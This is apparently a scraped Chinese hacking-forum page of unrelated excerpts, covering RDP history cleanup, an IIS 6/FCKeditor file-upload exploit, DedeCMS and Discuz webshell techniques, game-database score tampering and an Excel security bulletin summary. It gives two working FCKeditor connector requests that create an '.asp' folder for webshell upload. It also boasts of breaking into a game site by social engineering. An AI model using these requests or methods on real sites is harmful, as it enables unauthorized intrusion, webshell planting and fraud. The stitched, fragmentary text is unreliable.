点击 开始 -> 运行 输入regedit

进入以下注册表分支:
　　[HKEY_CURRENT_USER/Software/Microsoft/Terminal Server /Client/Default]
　　列出的MRU0 / MRU1 ...
　　显示的就是你使用桌面连接器输入过的IP地址。
　　把你不需要的IP删除掉就可以了。

利用2003的解析问题。直接说利用方法！

第一步：

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fra1nker.asp&NewFolderName=z&uuid=1244789975684

第二步：
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

...

老早就看到有人发的洞，一直想过写分析来着，最近一直呆在UBUNTU下安装东西。。老忘。。。
有时有些朋友加我，教他找洞。。。这个好似是个累活，而且运气占很大一部分。。。所以我还是尽量帮分析过程发出来吧，也方便我自己学习。
具体的EXP，请看：http://www.st0p.org/blog/archives/dedecms-5-5-datalistcp-class-php-contains-exp.html

以前呢，DEDECMS会把出错的SQL信息，写进mysql_error_trace.php，后来被大牛们爆出来了。就改名为mysql_error_trace.inc了。。。
...

详细介绍:按键精灵是一个模拟鼠标键盘动作的软件。通过制作脚本，可以让按键精灵代替您的双手，自动执行一系列鼠标键盘动作。按键精灵简单易用，不需要任何编程知识就可以作出功能强大的脚本。只要您在电脑前用双手可以完成的动作，按键精灵都可以替您完成。

单击下载

...

无意中入侵了游戏官方网站，可拿不到Webshell，郁闷中发现里面有个Discuz!论坛，马上根据已经拿到的密码社工，呵呵，居然成功进入后台！可是毕竟是6.0+的版本（管理员把版权去掉了），网上众所周知的编辑模板（模板编辑功能受限）办法来拿SHELL很是不爽，想起来编辑任意模板文件，然后eval出SHELL的方法，终于搞定！下面就是方法的实现步骤：目前通吃所有DZ版本。

 

 

详细介绍:对迅雷 旋风 快车 加密过的网址进行加密,当然也可以将普通的网址加密成 【迅雷 旋风 快车】可以下载的格式.

...

今天比较闷，就随便上来扯两句，关于刷库这玩意

刷库，就是update money=1000000，商人习惯叫 刷分，听上去好象很NB，看上去特崇拜，其实也就那么回事。

首先声明，我已经洗手从良几年了，我下面提到的东西，都是比较老旧的，或者是过时的技术，如果你觉得对你没帮助，别拍砖，我是菜鸟，哥我从良了。

刷库相对于挂马行业来说，技术相对来说是高一点的，我一直以来的看法，挂马就是个体力活，我懒，所以我没挂过马。但是刷库，也并不是一件很难的事。

...

发布日期： 三月 9, 2010
版本： 1.0
等级：重要


摘要 
此安全更新可解决 Microsoft Office Excel 中七个秘密报告的漏洞。 如果用户打开特制的 Excel 文件，这些漏洞可能允许远程执行代码。 成功利用这些漏洞的攻击者可以获得与本地用户相同的用户权限。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。
...